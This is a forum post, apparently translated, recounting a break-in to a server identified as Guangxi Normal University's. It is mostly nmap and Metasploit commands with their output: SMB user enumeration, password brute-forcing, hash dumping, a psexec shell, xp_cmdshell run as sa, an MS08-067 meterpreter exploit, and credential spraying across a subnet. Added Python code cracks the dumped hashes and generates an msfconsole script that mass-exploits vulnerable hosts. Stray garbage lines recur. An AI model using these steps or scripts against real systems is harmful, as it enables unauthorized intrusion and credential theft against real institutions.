Breaking into Guangxi Normal University with nmap + msf

Posted by the original poster on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
" U4 u/ g7 u7 T6 d
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241

// this uses the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241

// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
1 f7 N* r6 n" e8 r& L; O" S8 N
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241

// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
  {" J! p* O7 l5 p# c5 J8 ~
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes

root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data

root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
- |2 m) d# u' i2 l: R; T* a: r/ ~% t3 l" H7 z
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
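The LM:NT pairs that smb-pwdump returned above can be read and tested offline without touching the target again. The Python below is an added example written for this page; it is not from the original post, nmap or pwdump. It reimplements MD4 so the NT hash can be computed even where hashlib.new("md4") is unavailable, parses the four dump lines exactly as printed above, reports what the LM half gives away before any cracking (a second half of AAD3B435B51404EE means the password is at most 7 characters, and LM is case-insensitive), and runs a small constructed wordlist against the NT hashes. The same weakness is why the later step can feed 44EFCE164AB921CAAAD3B435B51404EE to smb-brute as a "password" entry: the stored hash is itself the credential. The wordlist is constructed; the dump lines are the page's own.

```python
import struct

# Hash pair of the empty password; pwdump-style tools print "NO PASSWORD****" instead.
LM_EMPTY = "AAD3B435B51404EE" * 2
NT_EMPTY = "31D6CFE0D16AE931B73C59D7E0C089C0"
# DES of the LM constant under an all-zero 7-byte key half: the second half of every
# LM hash whose password is 7 characters or shorter.
LM_HALF_EMPTY = "AAD3B435B51404EE"

# Copied from the smb-pwdump output above; the wordlist is constructed for the demo.
SAMPLE_DUMP = [
    "| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************",
    "| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************",
    "| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4",
    "|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2",
]
WORDLIST = ["", "password", "123456", "admin", "guangxi"]


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320) in pure Python: the digest behind the NT hash.

    Written out here because hashlib.new("md4") needs OpenSSL's legacy provider,
    which many current systems do not load.
    """
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)

    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    # Per round: mix function, message-word order, rotation amounts, additive constant.
    rounds = (
        (f, list(range(16)), (3, 7, 11, 19), 0),
        (g, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (h, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        words = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for mix, order, shifts, const in rounds:
            for i, w in enumerate(order):
                a = _rol((a + mix(b, c, d) + words[w] + const) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers: the next step updates the old d
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), upper-case hex as pwdump prints it."""
    return md4(password.encode("utf-16le")).hex().upper()


def parse_pwdump(lines):
    """Parse 'user:rid => LM:NT' lines (nmap's '|' prefixes tolerated) into a dict."""
    users = {}
    for line in lines:
        line = line.strip().lstrip("|_ ")
        if "=>" not in line:
            continue
        ident, hashes = (p.strip() for p in line.split("=>", 1))
        user, rid = ident.rsplit(":", 1)
        lm, nt = hashes.split(":", 1)
        users[user] = {
            "rid": int(rid),
            "lm": LM_EMPTY if lm.startswith("NO PASSWORD") else lm.upper(),
            "nt": NT_EMPTY if nt.startswith("NO PASSWORD") else nt.upper(),
        }
    return users


def assess(entry):
    """What the stored pair reveals before any cracking is attempted."""
    notes = []
    if entry["nt"] == NT_EMPTY:
        notes.append("empty password")
    if entry["lm"] != LM_EMPTY:
        notes.append("LM hash present: password is case-insensitive and at most 14 chars")
        if entry["lm"][16:] == LM_HALF_EMPTY:
            notes.append("second LM half empty: password is 7 chars or shorter")
    return notes


def crack_nt(users, wordlist):
    """Dictionary check of the NT hashes; returns {user: password} for every hit."""
    table = {nt_hash(w): w for w in wordlist}
    return {u: table[e["nt"]] for u, e in users.items() if e["nt"] in table}


if __name__ == "__main__":
    dump = parse_pwdump(SAMPLE_DUMP)
    hits = crack_nt(dump, WORDLIST)
    for user, entry in dump.items():
        line = f"{user} (RID {entry['rid']}): {', '.join(assess(entry)) or 'no structural weakness'}"
        print(line + (f"; cracked: {hits[user]!r}" if user in hits else ""))
```

Run stand-alone it reports "empty password" for Administrator and Guest, and for test both "second LM half empty: password is 7 chars or shorter" and the cracked value '123456', which is what smb-brute found earlier by guessing over the network; TsInternetUser is not in the wordlist and is left alone.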

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection (本地连接):

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and run a command
9 f5 u9 x( [# O) m3 x1 i6 Y
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // use the MS08-067 vulnerability in msf to overflow the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]    (Ctrl+Z)
msf  exploit(ms08_067_netapi) > sessions -l
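The smb-check-vulns run and the msfconsole session above are the two steps worth wiring together once more than one host is in scope. The Python below is an added example for this page, not nmap's or Metasploit's own tooling. It parses nmap's XML output (-oX, the stable interface, rather than the screen output shown above), keeps hosts with 445/tcp open whose smb-check-vulns result reads "MS08-067: VULNERABLE", writes an msfconsole resource script that fires ms08_067_netapi at each of them with the same bind_tcp meterpreter payload used above, and flags MACs in the 08:00:27 range, which the nmap table of the time labels Cadmus Computer Systems and which VirtualBox assigns to guest NICs, so a lab VM is not mistaken for a production host. The XML is constructed by hand to mirror the page's results plus one invented patched host; the sample MAC's last octets are made up.

```python
import xml.etree.ElementTree as ET

# OUI that older nmap MAC tables list as Cadmus Computer Systems; VirtualBox
# assigns it to guest NICs, so it marks a VM rather than physical hardware.
VBOX_OUI = "08:00:27"

# Constructed sample shaped like `nmap -sV --script=smb-check-vulns.nse -oX -` output:
# the first host mirrors the results above (MAC tail made up), the second is an
# invented host that has the patch.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV --script=smb-check-vulns.nse -oX - 202.103.242.241 192.168.1.20">
  <host>
    <status state="up"/>
    <address addr="202.103.242.241" addrtype="ipv4"/>
    <address addr="08:00:27:7F:2E:79" addrtype="mac" vendor="Cadmus Computer Systems"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds" product="Microsoft Windows 2000 microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-term-serv"/></port>
    </ports>
    <hostscript>
      <script id="smb-check-vulns" output="&#xa;  MS08-067: VULNERABLE"/>
    </hostscript>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.168.1.20" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
    <hostscript>
      <script id="smb-check-vulns" output="&#xa;  MS08-067: NOT VULNERABLE"/>
    </hostscript>
  </host>
</nmaprun>
"""


def parse_hosts(xml_text):
    """Reduce nmap XML to {ip, mac, vendor, open_tcp, scripts} for each live host."""
    hosts = []
    for h in ET.fromstring(xml_text).iter("host"):
        status = h.find("status")
        if status is None or status.get("state") != "up":
            continue
        info = {"ip": None, "mac": None, "vendor": None, "open_tcp": [], "scripts": {}}
        for addr in h.findall("address"):
            if addr.get("addrtype") == "ipv4":
                info["ip"] = addr.get("addr")
            elif addr.get("addrtype") == "mac":
                info["mac"] = addr.get("addr").upper()
                info["vendor"] = addr.get("vendor")
        for port in h.findall("ports/port"):
            state = port.find("state")
            if port.get("protocol") == "tcp" and state is not None and state.get("state") == "open":
                info["open_tcp"].append(int(port.get("portid")))
        for script in h.findall("hostscript/script"):
            info["scripts"][script.get("id")] = script.get("output", "")
        hosts.append(info)
    return hosts


def is_virtualbox(host):
    """True when the MAC carries the VirtualBox OUI: a lab VM, not a real server."""
    return bool(host["mac"]) and host["mac"].startswith(VBOX_OUI)


def ms08_067_candidates(hosts):
    """IPs with 445/tcp open that smb-check-vulns reported as 'MS08-067: VULNERABLE'."""
    return [
        h["ip"]
        for h in hosts
        if 445 in h["open_tcp"]
        and "MS08-067: VULNERABLE" in h["scripts"].get("smb-check-vulns", "")
    ]


def msf_resource(targets, payload="windows/meterpreter/bind_tcp"):
    """Text of an msfconsole resource script (run with `msfconsole -r ms08_067.rc`).

    Each target is exploited as a background job (-j) without auto-interacting with
    the session (-z), so `sessions -l` lists them all at the end. RHOSTS is the
    current option name; the 2012-era console in the post used RHOST.
    """
    lines = ["use exploit/windows/smb/ms08_067_netapi", f"set PAYLOAD {payload}"]
    for ip in targets:
        lines += [f"set RHOSTS {ip}", "exploit -j -z"]
    lines.append("sessions -l")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    hosts = parse_hosts(SAMPLE_XML)
    for h in hosts:
        tag = " [VirtualBox guest]" if is_virtualbox(h) else ""
        print(f"{h['ip']}{tag}: open tcp {h['open_tcp']}")
    print(msf_resource(ms08_067_candidates(hosts)), end="")
```

With real data, replace SAMPLE_XML by the contents of the file written with `-oX`; only the host that check-vulns flagged ends up in the resource script, and the VirtualBox tag on the first host is the hint that the scan above was run against a VM image rather than the university's server.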

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254

// use the usernames and the captured hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful; a simple msf + nmap attack~~
* A7 A. K4 j7 F% H1 Q: w- R8 [+ H; Z. I% h' D9 i